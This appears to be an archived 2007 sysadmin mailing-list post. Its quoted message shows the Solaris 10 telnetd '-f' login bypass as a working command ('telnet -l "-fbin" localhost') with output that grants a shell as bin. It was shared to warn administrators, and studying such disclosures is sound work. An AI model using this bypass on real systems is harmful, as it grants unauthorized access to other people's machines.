[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[SAGE] Re: [lopsa-tech] Remote Exploit Solaris telnetd
- To: SAGE mailing list <sage-members@sage.org>
- Subject: [SAGE] Re: [lopsa-tech] Remote Exploit Solaris telnetd
- From: "Michael T. Halligan" <michael@halligan.org>
- Date: Mon, 12 Feb 2007 10:22:17 -0800
- In-Reply-To: <bb075cdf0702112022q16f1bd1erd05484a6d958ff06@mail.gmail.com>
- References: <bb075cdf0702112022q16f1bd1erd05484a6d958ff06@mail.gmail.com>
- Sender: owner-sage-members@usenix.org
1989 called and they want their insecure, obsolete protocol back.
On Feb 11, 2007, at 8:22 PM, Rodrick Brown wrote:
> I dont take credit for finding this bug it was posted on nanog-l a
> few hours ago but I thought it would be much more useful here on
> SAGE and LOPSA, at least everyone disables telnet right?
>
> bash-3.00# svcadm enable telnet
> bash-3.00# telnet -l "-fbin" localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> Last login: Sun Feb 11 13:10:36 from 64.111.214.138
> Sun Microsystems Inc. SunOS 5.10 Generic January 2005
> $ id
> uid=2(bin) gid=2(bin)
> $
>
> bash-3.00# telnet -l "-froot" localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> Not on system console
> Connection to localhost closed by foreign host.
>
> --
> Rodrick R. Brown
> _______________________________________________
> Tech mailing list
> Tech@lopsa.org
> http://lopsa.org/cgi-bin/mailman/listinfo/tech
> This list provided by the League of Professional System Administrators
> http://lopsa.org/